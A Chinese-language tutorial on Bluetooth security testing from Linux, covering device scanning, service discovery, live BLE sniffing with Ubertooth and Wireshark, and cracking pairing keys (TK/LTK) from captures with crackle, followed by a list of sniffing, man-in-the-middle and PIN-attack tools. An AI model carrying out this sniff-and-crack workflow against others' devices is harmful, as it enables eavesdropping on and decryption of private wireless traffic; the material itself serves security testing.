安卓查看蓝牙:在拨号界面,输入 *#*#2846579#*#*,手机会自动跳转(安卓一般方法)

系统启动后,查看设备:

root@Xstorm:/mnt# lsusb
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 002 Device 005: ID 1d50:6002 OpenMoko, Inc. 
Bus 002 Device 004: ID 0e0f:0008 VMware, Inc. 
Bus 002 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 002 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub

应该加载的驱动:

root@Xstorm:/mnt# lsmod | grep bt
btusb                  40960  0 
bluetooth             491520  22 bnep,btusb,rfcomm


有蓝牙设备的话,查看蓝牙的状态和信息:

root@Xstorm:/mnt# hciconfig -a 
hci0:    Type: BR/EDR  Bus: USB
    BD Address: BC:3D:85:BA:FB:D6  ACL MTU: 8192:128  SCO MTU: 64:128
    UP RUNNING PSCAN ISCAN 
    RX bytes:4018 acl:6 sco:0 events:152 errors:0
    TX bytes:1204 acl:12 sco:0 commands:77 errors:0
    Features: 0xff 0xff 0x8f 0xfe 0x83 0xe1 0x08 0x80
    Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3 
    Link policy: RSWITCH HOLD SNIFF PARK 
    Link mode: SLAVE ACCEPT 
    Name: 'ubuntu-0'
    Class: 0x640100
    Service Classes: Rendering, Audio, Telephony
    Device Class: Computer, Uncategorized
    HCI Version: 2.1 (0x4)  Revision: 0x100
    LMP Version: 2.1 (0x4)  Subversion: 0x100
    Manufacturer: not assigned (6502)

常用的蓝牙命令:

hciconfig hci0 up  #启动蓝牙设备
hciconfig hci0 off #关闭蓝牙设备

蓝牙扫描:

hcitool scan        #进行蓝牙扫描
hcitool lescan        #低功耗蓝牙扫描

 

测试连通性:

l2ping -i hci0 -c 4 24:1F:A0:CE:50:69 # 测试蓝牙A2:CF:49:FD:99:AF是否连通


利用 SDP 协议,我们还可以查看每个设备都有功能,能提供什么服务:

root@Xstorm:/mnt# sdptool browse local    # local可以改成其它蓝牙的mac地址
Browsing FF:FF:FF:00:00:00 ...
Service Name: SIM Access Server
Service RecHandle: 0x10000
Service Class ID List:
  "SIM Access" (0x112d)
  "Generic Telephony" (0x1204)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 8
Profile Descriptor List:
  "SIM Access" (0x112d)
    Version: 0x0101

Service Name: Headset Audio Gateway
Service RecHandle: 0x10001
Service Class ID List:
  "Headset Audio Gateway" (0x1112)
  "Generic Audio" (0x1203)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 12
Profile Descriptor List:
  "Headset" (0x1108)
    Version: 0x0102

Service Name: Hands-Free Audio Gateway
Service RecHandle: 0x10002
Service Class ID List:
  "Handsfree Audio Gateway" (0x111f)
  "Generic Audio" (0x1203)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 13
Profile Descriptor List:
  "Handsfree" (0x111e)
    Version: 0x0105

Service Name: Hands-Free
Service RecHandle: 0x10003
Service Class ID List:
  "Handsfree" (0x111e)
  "Generic Audio" (0x1203)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 7
Profile Descriptor List:
  "Handsfree" (0x111e)
    Version: 0x0105

Service Name: AVRCP TG
Service RecHandle: 0x10004
Service Class ID List:
  "AV Remote Target" (0x110c)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 23
  "AVCTP" (0x0017)
    uint16: 0x103
Profile Descriptor List:
  "AV Remote" (0x110e)
    Version: 0x0104

Service Name: AVRCP CT
Service RecHandle: 0x10005
Service Class ID List:
  "AV Remote" (0x110e)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 23
  "AVCTP" (0x0017)
    uint16: 0x103
Profile Descriptor List:
  "AV Remote" (0x110e)
    Version: 0x0100


蓝牙数据进行实时嗅探:

mkfifo /mnt/pipe
打开wireshark
Capture -> Options -> Manage Interfaces -> New
输入 /mnt/pipe
点击start开始监听。

# 注意:使用ubertooth工具,需要具备ubertooth硬件
root@Xstorm:/mnt# ubertooth-btle -f -c /mnt/pipe
最最后,不要忘了这一步。不然你抓到的包根本看不成
Edit → Preferences → Protocols → DLT_USER → Edit → New
在payload protocol中输入btle
ok → ok


如果你想把抓好的包带回家慢慢整,你可以简单的包抓取的内容输出到某个目录下

ubertooth-btle -f -c /output.pcap

抓到包之后我们最关心的问题是我们有没有抓到的足够的包来破解tk。

所以在wireshark中你可以在filter处加上btsmp,确保抓到了我们需要的6个包。

借助cracle和我们抓到的包依次破解tk和ltk

crackle -i  out.pcap -o test66.pcap

工具集:

测试工具集

ubuntu平台:

  • hcitool、bluetoothctl等工具,可以进行BLE设备的扫描、连接、配对、广播等操作[ubuntu系统自带]
  • hcitool 可以发送HCI command,设置BLE的广播数据[ubuntu系统自带]
  • sdptool 查看蓝牙信息和提供的服务[ubuntu系统自带]
  • hciconfig 查看蓝牙信息[ubuntu系统自带]
  • l2ping 测试蓝牙的连通性[ubuntu系统自带]
  • bluebugger
  • ClusterFuzz
  • gatttool :可以在GATT层面,完成GATT profile的连接、service attribute的读写等操作[https://www.jaredwolff.com/blog/get-started-with-bluetooth-low-energy/]
  • Btproxy 蓝牙代理工具[https://github.com/conorpp/btproxy]
  • crackle 数据解密ltk[https://github.com/mikeryan/crackle]
  • btlejuice 中间人测试工具[https://github.com/DigitalSecurity/btlejuice]
  • ubertooth:是个很强大的蓝牙嗅探工具[https://github.com/greatscottgadgets/ubertooth/wiki/Build-Guide]
    •     ubertooth-scan 
    •     ubercooth-rx
    •     ubertooth-follow
    •     ubertooth-btle 

windows平台:

  • BluetoothView

 

安卓平台:

  • Bluetooth Finder
  • btCrawler
  • BTScanner
  • BlueScan

 

测试硬件设备:

  • "SENA Parani UD-100"适配器
  • 蓝牙加密狗 --传统蓝牙
  • 超牙一号
  • http://www.fte.com  蓝牙嗅探设备 --传统蓝牙
  • BEX400   蓝牙嗅探和pin码入侵设备 --传统蓝牙
  • CC2540 USB评估模块

 

Logo

更多推荐